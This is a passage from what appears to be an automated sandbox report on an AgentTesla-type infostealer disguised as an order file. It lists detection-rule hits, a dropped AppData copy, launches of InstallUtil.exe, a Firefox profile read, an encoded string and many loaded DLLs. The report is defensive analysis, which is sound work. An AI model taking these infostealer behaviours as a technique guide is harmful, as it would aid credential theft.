                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A88C786_2_06A88C78
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A800066_2_06A80006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A800406_2_06A80040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC42C06_2_06BC42C0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCA1986_2_06BCA198
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC42B06_2_06BC42B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC12E06_2_06BC12E0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BC12D36_2_06BC12D3
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCA2286_2_06BCA228
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCA1886_2_06BCA188
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD86906_2_06BD8690
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BDC2F06_2_06BDC2F0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD86826_2_06BD8682
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BDC6276_2_06BDC627
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD00066_2_06BD0006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD00406_2_06BD0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD91106_2_06BD9110
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD91006_2_06BD9100
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BDD9086_2_06BDD908
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEFA606_2_06BEFA60
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEFE1E6_2_06BEFE1E
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEFA4F6_2_06BEFA4F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BEA0F86_2_06BEA0F8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06C500406_2_06C50040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06C5003E6_2_06C5003E
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA3E086_2_06CA3E08
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA49306_2_06CA4930
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA8ADA6_2_06CA8ADA
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA87476_2_06CA8747
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA3DF96_2_06CA3DF9
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA491F6_2_06CA491F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EFD7986_2_06EFD798
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EFCB286_2_06EFCB28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EE00406_2_06EE0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06EE00066_2_06EE0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C4A607_2_014C4A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C9C627_2_014C9C62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014CCF287_2_014CCF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C3E487_2_014C3E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_014C41907_2_014C4190
                    Source: GEFA-Order 232343-68983689.exeBinary or memory string: OriginalFilename vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1388363679.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1408943275.0000000006C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYmvjoijhcv.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYmvjoijhcv.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYmvjoijhcv.dll" vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000000.1332685429.0000000000F72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1408089923.0000000005BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exeBinary or memory string: OriginalFilenamePrlwiygeyof.exe8 vs GEFA-Order 232343-68983689.exe
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: GEFA-Order 232343-68983689.exe, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: GEFA-Order 232343-68983689.exe, Fjvoeakus.csCryptographic APIs: 'CreateDecryptor'
                    Source: Fqhnalw.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: Fqhnalw.exe.0.dr, Fjvoeakus.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: GEFA-Order 232343-68983689.exe, -.csBase64 encoded string: 'uvSesxFpx9+IoRhhivmEqBoqqP6eohlmhfTWgBFwrOOZtQ1Fmv6IqhZokLaKogBbr/iBqzplhOjWqARboOOItgFlheSZvk9jjPmyixFqjvmF/DNhndmUtxFCm+KAjxVqjeGI/BNhndKjphlh0sSDoxF8puvWlRFljd6ZtR1qjrasoxA/juiZmCRrmuSZrhtq0uqIsytHnP+fohpwreKAph1q0t6IszBlnezW9EQz0bjWhgd3jOCPqw1XjP+bogY/uuSAtxhhqP6eohlmhfSovwRohv+ItU9miO+IqwJp0v6AqB9hneiesw=='
                    Source: Fqhnalw.exe.0.dr, -.csBase64 encoded string: 'uvSesxFpx9+IoRhhivmEqBoqqP6eohlmhfTWgBFwrOOZtQ1Fmv6IqhZokLaKogBbr/iBqzplhOjWqARboOOItgFlheSZvk9jjPmyixFqjvmF/DNhndmUtxFCm+KAjxVqjeGI/BNhndKjphlh0sSDoxF8puvWlRFljd6ZtR1qjrasoxA/juiZmCRrmuSZrhtq0uqIsytHnP+fohpwreKAph1q0t6IszBlnezW9EQz0bjWhgd3jOCPqw1XjP+bogY/uuSAtxhhqP6eohlmhfSovwRohv+ItU9miO+IqwJp0v6AqB9hneiesw=='
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File created: C:\Users\user\AppData\Roaming\Fqhnalw.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GEFA-Order 232343-68983689.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: GEFA-Order 232343-68983689.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File read: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fqhnalw.exe "C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fqhnalw.exe "C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
